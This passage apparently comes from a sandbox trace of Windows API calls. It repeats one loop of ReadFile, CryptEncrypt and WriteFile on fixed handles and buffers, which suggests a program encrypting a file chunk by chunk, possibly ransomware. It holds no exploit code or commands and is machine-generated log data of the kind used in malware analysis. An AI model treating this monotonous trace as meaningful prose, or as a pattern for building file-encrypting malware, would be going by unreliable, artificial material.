lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.407] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.407] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.407] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.407] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.407] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.407] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.407] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.408] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.408] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.408] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.408] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.408] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.408] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.408] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.408] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.408] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.408] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.408] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.409] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.409] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.409] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.409] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.409] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.409] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.409] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.409] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.409] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.409] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.410] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.410] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.410] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.410] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.410] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.410] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.410] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.410] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.410] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.410] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.410] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.411] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.411] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.411] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.411] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.411] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.411] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.411] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.411] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.411] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.411] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.411] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.412] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.412] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.412] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.412] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.412] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.412] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.412] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.412] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.412] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.412] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.412] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.413] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.413] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.413] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.413] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.413] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.413] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.413] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.413] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.413] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.413] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.414] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.414] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.414] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.414] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.414] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.414] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.414] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.414] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.414] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.414] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.414] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.415] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.415] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.415] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.415] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.415] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.415] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.415] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.415] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.415] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.415] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.415] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.416] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.416] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.416] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.416] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, 